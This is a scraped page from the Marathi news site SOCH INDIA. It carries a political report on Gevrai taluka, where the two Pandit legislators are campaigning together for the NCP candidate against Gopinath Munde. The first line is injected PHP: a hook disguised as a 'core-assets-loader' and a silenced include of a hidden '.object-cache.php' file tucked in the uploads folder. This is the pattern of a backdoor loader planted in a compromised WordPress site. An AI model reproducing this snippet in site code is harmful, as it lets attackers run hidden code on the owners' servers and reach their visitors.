add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दोन पंडित; मुंडे खिंडीत! – SOCH INDIA
Menu

देश,राजनीति
दोन पंडित; मुंडे खिंडीत!

nobanner

सखाराम शिंदे – गेवराई (जि.बीड)
तालुक्यात कधी नव्हे ते दोन पंडित एकत्रित आल्याने भाजपाची पुरती गोची झाली आहे. भाजपाचे सारथ्य यावेळी पवार घराण्याकडे आहे. दोन पंडितांशी त्यांची एकाकी झुंज सुरु आहे.
मागील निवडणुकीत भाजपाचे ज्येष्ठ नेते गोपीनाथ मुंडे यांच्या मागे आ. अमरसिंह पंडित सावलीप्रमाणे उभे होते. त्यामुळे या मतदारसंघातून मुंडेंना २७ हजाराची ‘लिड’ मिळाली होती. आता मात्र स्थिती बदलली आहे. आ. अमरसिंह पंडित यांनी मुंडेंची साथ सोडून राष्ट्रवादीत जाणे पसंत केले. त्यानंतर त्यांना बक्षीस म्हणून विधानपरिषदेवर संधी देण्यात आली. आ. बदामराव पंडित आधीच राष्ट्रवादीत होते. त्यात अमरसिंहांची भर पडल्याने येथे दोन वेगवेगळे टोक एका छताखाली आले. लोकसभा निवडणुकीत गोपीनाथ मुंडे यांना शह देण्यासाठी राष्ट्रवादीने शरद पवार यांच्या उपस्थितीत सुरेश धस यांच्या प्रचाराचा नारळ फोडला. त्यानंतर भाजपानेही मुंडेंच्या प्रचाराची सुरुवात गेवराईत सभा घेऊन ‘हिसाब बराबर’ केला. मात्र, मतांच्या हिशोबात वर्चस्व राखण्यासाठी दोन्ही पंडितांनी वज्रमुठ आवळली आहे. त्यामुळे मुंडेंची पुरती कोंडी झाली आहे. अँड. लक्ष्मण पवार यांनी मुंडेंसाठी ‘टाईट फिल्डींग’ लावली आहे; पण त्यांचा प्रभाव शहरातच जास्त आहे. ग्रामीण भागात दोन्ही पंडितांचे मोठे वलय आहे. त्यामुळे पंडितांच्या घड्याळापुढे भाजपाच्या कमळाचा निभाव लागेल का? याचीच सर्वांना उत्कंठा आहे.
अमरसिंहांची कडाडून टीका
आ. अमरसिंह पंडित व आ. बदामराव पंडित सुरेश धस यांच्यासाठी जीवाचे रान करत आहेत. आ. अमरसिंह पंडितांकडे शिक्षण, सहकारी संस्थांचे मोठे जाळे आहे. त्यामुळे त्यांचा दांडगा जनसंपर्क आहे. अमरसिंह यांनी जिल्हा बँक घोटाळा, रखडलेली विकासकामे यावरुन गोपीनाथ मुंडेंविरुद्ध टिकेची झोड उठविली आहे. प्रचारात ते अतिशय आक्रमकपणे मुंडेंवर तोफ डागत आहेत. तर दुसरीकडे आ. बदामराव पंडित हे देखील अस्सल ग्रामीण शब्दांची पेरणी करुन मतदारांना आकर्षित करत असल्याचे दिसून येत आहे.